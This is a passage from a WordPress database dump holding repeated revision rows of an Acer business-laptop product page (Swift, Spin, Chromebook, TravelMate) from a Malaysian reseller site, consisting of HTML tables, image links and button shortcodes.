width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:40:17','2019-09-17 09:40:17','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3121,1,'2019-09-17 17:40:46','2019-09-17 09:40:46','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:40:46','2019-09-17 09:40:46','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3122,1,'2019-09-17 17:41:29','2019-09-17 09:41:29','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:41:29','2019-09-17 09:41:29','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3123,1,'2019-09-17 17:42:07','2019-09-17 09:42:07','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:42:07','2019-09-17 09:42:07','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3124,1,'2019-09-18 14:13:35','2019-09-18 06:13:35','<h1>Business Product Solution</h1>\r\n&nbsp;\r\n<h2 class=\"fs-4 align-center margin-top-l\">Swift</h2>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" 